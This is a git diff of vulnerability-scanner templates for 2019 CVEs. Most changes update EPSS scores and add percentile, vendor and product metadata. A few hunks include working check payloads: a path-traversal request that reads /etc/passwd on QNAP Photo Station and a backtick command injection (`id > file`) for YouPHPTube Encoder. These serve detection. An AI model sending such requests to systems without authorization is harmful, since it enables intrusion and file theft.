--- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-20 epss-score: 0.96882 cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.99577 metadata: max-request: 2 shodan-query: http.title:"prime infrastructure" diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index 80178d5a07..dc15d6313b 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18371 cwe-id: CWE-22 - epss-score: 0.01614 + epss-score: 0.02272 cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.88207 metadata: max-request: 1 vendor: mi diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index ee726c7858..f703ea0056 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00161 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* + epss-percentile: 0.52069 metadata: max-request: 1 vendor: igniterealtime diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index c8fd2ed149..67048a5f59 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-18394 cwe-id: CWE-918 - epss-score: 0.62562 + epss-score: 0.5914 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* + epss-percentile: 0.97299 metadata: max-request: 1 vendor: igniterealtime diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index eb08192ae9..47aa383dcc 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18665 cwe-id: CWE-22 - epss-score: 0.10136 + epss-score: 0.0855 cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* + epss-percentile: 0.93623 metadata: max-request: 1 vendor: secudos diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index eab1daa153..3f9a2656b5 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-18818 cwe-id: CWE-640 - epss-score: 0.82132 + epss-score: 0.88411 cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* + epss-percentile: 0.98263 metadata: max-request: 1 vendor: strapi diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index 96f786b121..d4189c57da 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18922 cwe-id: CWE-22 - epss-score: 0.06307 + epss-score: 0.16768 cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.95348 metadata: max-request: 1 vendor: alliedtelesis diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index 22a0f7bc8c..6a66a42b94 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-79 epss-score: 0.00247 cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:* + epss-percentile: 0.61933 metadata: max-request: 1 vendor: microstrategy diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 7dfcc16ae3..1b6944941c 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -13,20 +13,26 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 + cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 + epss-score: 0.06482 + cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.928 metadata: fofa-query: icon_hash="-646322113" verified: true max-request: 1 + vendor: cisco + product: rv110w_firmware tags: cve,cve2019,cisco,router,iot http: - method: POST path: - '{{BaseURL}}/_syslog.txt' + headers: Content-Type: application/x-www-form-urlencoded - matchers: - type: dsl dsl: diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index 10664f4e50..99ea844c17 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00203 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.57549 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index b9337c98c8..db0f39cfa3 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-19368 cwe-id: CWE-79 - epss-score: 0.00596 + epss-score: 0.00625 cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* + epss-percentile: 0.76278 metadata: max-request: 1 vendor: maxum diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index 6f6b305cf8..9bcec51f8a 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-601 epss-score: 0.03526 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.90351 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 67af451b7e..76506e3561 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-19781 cwe-id: CWE-22 - epss-score: 0.9748 + epss-score: 0.97541 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:* + epss-percentile: 0.9999 metadata: max-request: 1 vendor: citrix diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml index 5f7ae70a16..972949af09 100644 --- a/http/cves/2019/CVE-2019-19824.yaml +++ b/http/cves/2019/CVE-2019-19824.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2019-19824 cwe-id: CWE-78 - epss-score: 0.97234 + epss-score: 0.96631 cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99466 metadata: max-request: 1 vendor: totolink diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index 46acb2ea46..382590b1bc 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00622 cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:* + epss-percentile: 0.76214 metadata: max-request: 1 verified: true diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index a1e1c096e0..ac0a24c888 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2019-19985 cwe-id: CWE-862 - epss-score: 0.05682 + epss-score: 0.08255 cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.93525 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index a95fb2b904..a1f5bdc87b 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-20085 cwe-id: CWE-22 - epss-score: 0.43503 + epss-score: 0.58096 cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.97276 metadata: max-request: 1 vendor: tvt diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index 9c3d70ca9b..e89a0a157f 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00125 cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* + epss-percentile: 0.46269 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index b2ed58fd38..41abdf4d20 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-434 epss-score: 0.0192 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.87111 metadata: max-request: 2 vendor: employee_records_system_project diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 6d11af6009..415507c748 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00249 cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.62023 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index dce04f1594..bf7aa62649 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -18,8 +18,9 @@ info: cvss-score: 8.8 cve-id: CVE-2019-20224 cwe-id: CWE-78 - epss-score: 0.18509 + epss-score: 0.15573 cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* + epss-percentile: 0.95195 metadata: max-request: 2 vendor: artica diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index cb7d0bafb4..8d52a31491 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-20933 cwe-id: CWE-287 - epss-score: 0.04077 + epss-score: 0.03713 cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* + epss-percentile: 0.90575 metadata: max-request: 1 shodan-query: InfluxDB diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index 78a2e96658..ee7c58b8fd 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -14,8 +14,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2019-2578 - epss-score: 0.00659 + epss-score: 0.00815 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* + epss-percentile: 0.79635 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index c29b9fa08e..602db3bc98 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2019-2579 epss-score: 0.00493 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* + epss-percentile: 0.73168 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index fa1e185353..fd0ab45e66 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -13,8 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.9 cve-id: CVE-2019-2588 - epss-score: 0.08268 + epss-score: 0.10482 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* + epss-percentile: 0.94259 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index aa68a18ec5..5f2b354490 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -13,8 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 - epss-score: 0.93436 + epss-score: 0.94746 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* + epss-percentile: 0.98945 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index dbb90c225c..b29054a931 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-2725 cwe-id: CWE-74 - epss-score: 0.97568 + epss-score: 0.97571 cpe: cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:* + epss-percentile: 0.99998 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index a97b411b90..099f2c7c7d 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 - epss-score: 0.97192 + epss-score: 0.97178 cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:* + epss-percentile: 0.99717 metadata: max-request: 3 vendor: oracle diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index 791d7dfe40..94f3aee397 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2019-2767 epss-score: 0.14972 cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* + epss-percentile: 0.95103 metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index 302b2b56c3..bcedb819b6 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-3396 cwe-id: CWE-22 - epss-score: 0.975 + epss-score: 0.97498 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* + epss-percentile: 0.9996 metadata: max-request: 1 shodan-query: http.component:"Atlassian Confluence" diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 962adcc90a..9509ad1aca 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2019-3398 cwe-id: CWE-22 - epss-score: 0.97304 + epss-score: 0.97342 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* + epss-percentile: 0.99829 metadata: max-request: 5 vendor: atlassian diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index 8ab2a1518c..7da5ea6818 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-863 epss-score: 0.0055 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + epss-percentile: 0.74576 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index 999d026e8d..aa0b55b566 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ b/http/cves/2019/CVE-2019-3402.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00238 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + epss-percentile: 0.61147 metadata: max-request: 1 verified: true diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml index c7099283e0..fe2eb6f1a5 100644 --- a/http/cves/2019/CVE-2019-3403.yaml +++ b/http/cves/2019/CVE-2019-3403.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-863 epss-score: 0.00379 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + epss-percentile: 0.69498 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml index b4a07f4164..1a7390404c 100644 --- a/http/cves/2019/CVE-2019-3799.yaml +++ b/http/cves/2019/CVE-2019-3799.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2019-3799 cwe-id: CWE-22 - epss-score: 0.01684 + epss-score: 0.0198 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* + epss-percentile: 0.87311 metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml index e96e50ec72..ceb7ef4a02 100644 --- a/http/cves/2019/CVE-2019-3911.yaml +++ b/http/cves/2019/CVE-2019-3911.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00195 cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* + epss-percentile: 0.56537 metadata: max-request: 1 shodan-query: 'Server: Labkey' diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index d56f8d05d0..e372ee2ab6 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-601 epss-score: 0.0016 cpe: cpe:2.3:a:labkey:labkey_server:*:*:*:*:community:*:*:* + epss-percentile: 0.51912 metadata: max-request: 1 shodan-query: 'Server: Labkey' diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index 047ebbc982..b619a807e8 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-3929 - cwe-id: CWE-78,CWE-79 - epss-score: 0.97436 + cwe-id: CWE-79,CWE-78 + epss-score: 0.97438 cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* + epss-percentile: 0.99911 metadata: max-request: 1 vendor: crestron diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index 94906f99b8..4fe6bb4194 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -13,14 +13,14 @@ info: cvss-score: 9.8 cve-id: CVE-2019-5127 cwe-id: CWE-78 - epss-score: 0.97401 + epss-score: 0.97404 cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* + epss-percentile: 0.99879 metadata: max-request: 4 vendor: youphptube product: youphptube_encoder tags: cve,cve2019,rce - variables: filename: "{{to_lower(rand_text_alpha(5))}}" encode: "`id > {{filename}}.txt`" diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index 0242bd4527..c044e22196 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-5418 - epss-score: 0.97413 + epss-score: 0.97427 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* + epss-percentile: 0.99897 metadata: max-request: 1 vendor: rubyonrails diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index 20bed1a3b5..b591405d47 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-502 epss-score: 0.28703 cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:* + epss-percentile: 0.9626 metadata: max-request: 2 shodan-query: http.favicon.hash:106844876 diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index df1e89557c..6ccc1d65cc 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-6112 cwe-id: CWE-79 - epss-score: 0.00123 + epss-score: 0.00126 cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.46438 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index e92c1677ab..feef9d510f 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -7,16 +7,17 @@ info: description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases. reference: - https://www.drupal.org/sa-core-2019-003 - - http://web.archive.org/web/20210125004201/https://www.securityfocus.com/bid/107106/ - https://www.synology.com/security/advisory/Synology_SA_19_09 - https://nvd.nist.gov/vuln/detail/CVE-2019-6340 + - https://www.exploit-db.com/exploits/46452/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2019-6340 cwe-id: CWE-502 - epss-score: 0.97479 + epss-score: 0.97369 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* + epss-percentile: 0.99849 metadata: max-request: 1 shodan-query: http.component:"drupal" diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index f0fc2d186b..6e6c7c19fa 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2019-6715 epss-score: 0.23312 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95923 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 08dd0d68fd..062f277ade 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -17,8 +17,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2019-6799 - epss-score: 0.10371 + epss-score: 0.13969 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + epss-percentile: 0.94952 metadata: max-request: 6 fofa-query: body="pma_servername" && body="4.8.4" diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index f135b56afb..3d0ea8f874 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-74 epss-score: 0.00113 cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* + epss-percentile: 0.44064 metadata: max-request: 1 shodan-query: html:"pypiserver" diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index c2d5e4242e..7624e65915 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -17,11 +17,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-7192 cwe-id: CWE-863 + epss-score: 0.96645 + cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* + epss-percentile: 0.99471 metadata: max-request: 3 verified: true shodan-query: 'Content-Length: 580 "http server 1.0"' - tags: cve,cve2019,lfi,rce,kev,qnap,qts + vendor: qnap + product: photo_station + tags: packetstorm,cve,cve2019,lfi,rce,kev,qnap,qts http: - raw: @@ -31,12 +36,10 @@ http: Content-Type: application/x-www-form-urlencoded a=setSlideshow&f=qsamplealbum - - | GET /photo/slideshow.php?album={{album_id}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /photo/p/api/video.php HTTP/1.1 Host: {{Hostname}} @@ -45,6 +48,7 @@ http: album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd cookie-reuse: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index bdd57a17f4..4538c704c2 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00113 cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* + epss-percentile: 0.43991 metadata: max-request: 1 vendor: zarafa diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index cef1eb3452..55b74bcc27 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -13,8 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-7238 - epss-score: 0.97455 + epss-score: 0.97478 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* + epss-percentile: 0.99947 metadata: max-request: 1 vendor: sonatype diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 6e0c0a5656..8db7454fda 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7254 cwe-id: CWE-22 - epss-score: 0.87419 + epss-score: 0.86088 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.9813 metadata: max-request: 2 vendor: nortekcontrol diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 7c4fc24609..b7c1b81fb0 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.01544 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.85509 metadata: max-request: 1 shodan-query: http.title:"eMerge" diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 703523c32b..1a628c7bb4 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -17,8 +17,9 @@ info: cvss-score: 10 cve-id: CVE-2019-7256 cwe-id: CWE-78 - epss-score: 0.97356 + epss-score: 0.97316 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99808 metadata: max-request: 2 verified: true diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml index 2359a9e820..86360f01ba 100644 --- a/http/cves/2019/CVE-2019-7275.yaml +++ b/http/cves/2019/CVE-2019-7275.yaml @@ -18,6 +18,7 @@ info: 